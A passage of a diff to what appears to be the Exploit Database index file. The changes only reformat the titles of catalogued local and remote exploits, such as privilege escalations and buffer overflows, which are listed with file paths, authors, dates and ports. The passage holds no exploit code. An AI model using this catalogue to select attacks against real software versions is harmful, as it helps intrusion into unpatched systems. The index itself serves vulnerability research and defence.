1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 +20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0 @@ -7985,7 +7990,7 @@ id,file,description,date,author,platform,type,port 21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 -21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 +21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - SEH + DEP Bypass",2012-10-03,b33f,windows,local,0 21720,platforms/irix/local/21720.txt,"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing",2002-08-16,"Michael Wardle",irix,local,0 21721,platforms/windows/local/21721.html,"Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure",2002-08-17,Jelmer,windows,local,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local,0 @@ -8392,7 +8397,7 @@ id,file,description,date,author,platform,type,port 27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 -27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 +27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 @@ -8612,7 +8617,7 @@ id,file,description,date,author,platform,type,port 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 -33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0 +33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - SGID Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0 33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0 @@ -8684,10 +8689,10 @@ id,file,description,date,author,platform,type,port 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 -35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - (Enable sudo) Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",linux,local,0 +35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Enable sudo Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",linux,local,0 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - 'World-writeable rc.sysinit' Privilege Escalation",2015-01-11,prdelka,linux,local,0 35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - 'Software Manager swmng.app' Privilege Escalation",2015-01-11,RichardG,linux,local,0 -35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 +35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 @@ -8786,7 +8791,7 @@ id,file,description,date,author,platform,type,port 37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local,0 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0 -37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0 +37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0 37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 @@ -8863,8 +8868,8 @@ id,file,description,date,author,platform,type,port 38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 -38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 -38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 +38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 +38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 @@ -9078,10 +9083,10 @@ id,file,description,date,author,platform,type,port 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0 -40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0 +40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0 40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 -40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 +40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local,0 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 @@ -9332,7 +9337,7 @@ id,file,description,date,author,platform,type,port 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 -55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 +55,platforms/linux/remote/55.c,"Samba 2.2.8 - Brute Force Method Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 @@ -9389,7 +9394,7 @@ id,file,description,date,author,platform,type,port 155,platforms/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow",2004-02-27,"Johnny Cyberpunk",windows,remote,389 -158,platforms/windows/remote/158.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - (MDTM) Remote Overflow",2004-02-27,Sam,windows,remote,21 +158,platforms/windows/remote/158.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow",2004-02-29,rdxaxl,windows,remote,21 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 (Windows) - Attachment Spoofing Exploit",2004-03-19,anonymous,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0 @@ -9402,7 +9407,7 @@ id,file,description,date,author,platform,type,port 173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0 -181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 +181,platforms/linux/remote/181.c,"Half Life - 'rcon' Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 189,platforms/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,windows,remote,80 190,platforms/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)",2000-11-18,Optyx,windows,remote,80 191,platforms/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,windows,remote,80 @@ -9416,7 +9421,7 @@ id,file,description,date,author,platform,type,port 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515 -228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 +228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 @@ -9433,7 +9438,7 @@ id,file,description,date,author,platform,type,port 279,platforms/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 282,platforms/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 -284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 +284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000 @@ -9460,7 +9465,7 @@ id,file,description,date,author,platform,type,port 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 -373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21 +373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,linux,remote,21 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 @@ -9470,7 +9475,7 @@ id,file,description,date,author,platform,type,port 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548 -392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 +392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - 'error_prog_name' Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 @@ -9510,18 +9515,18 @@ id,file,description,date,author,platform,type,port 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP 'STOR' Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 -592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 +592,platforms/windows/remote/592.py,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Buffer Overflow",2004-10-26,muts,windows,remote,25 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Executions (PoC)",2004-10-28,infamous41md,linux,remote,0 -612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0 +612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25 -621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 +621,platforms/windows/remote/621.c,"CCProxy 6.2 - 'ping' Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21 -627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 +627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - 'DELETE' Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25 638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110 @@ -9547,7 +9552,7 @@ id,file,description,date,author,platform,type,port 719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP 4.3.7 - 'openlog()' Buffer Overflow",2004-12-28,"The Warlock [BhQ]",windows,remote,80 -730,platforms/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution with Parameters (PoC)",2004-12-28,ShredderSub7,windows,remote,0 +730,platforms/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution (PoC)",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 @@ -9585,7 +9590,7 @@ id,file,description,date,author,platform,type,port 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,windows,remote,110 -859,platforms/windows/remote/859.c,"CA License Server - (GETCONFIG) Remote Buffer Overflow",2005-03-06,class101,windows,remote,10203 +859,platforms/windows/remote/859.c,"CA License Server - 'GETCONFIG' Remote Buffer Overflow",2005-03-06,class101,windows,remote,10203 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 @@ -9593,12 +9598,12 @@ id,file,description,date,author,platform,type,port 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 -903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 +903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Exploit",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 -934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 +934,platforms/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 @@ -9622,12 +9627,12 @@ id,file,description,date,author,platform,type,port 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0 990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,windows,remote,20031 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0 -1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",linux,remote,0 -1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - (imap) Remote Buffer Overflow",2005-06-02,"Jerome Athias",windows,remote,143 +1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - 'SIP' Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",linux,remote,0 +1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow",2005-06-02,"Jerome Athias",windows,remote,143 1028,platforms/windows/remote/1028.c,"Crob FTP Server 3.6.1 - Remote Stack Overflow",2005-06-03,"Leon Juranic",windows,remote,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String",2005-06-10,qobaiashi,linux,remote,143 -1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 +1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - 'addschup' Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 @@ -9656,14 +9661,14 @@ id,file,description,date,author,platform,type,port 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow 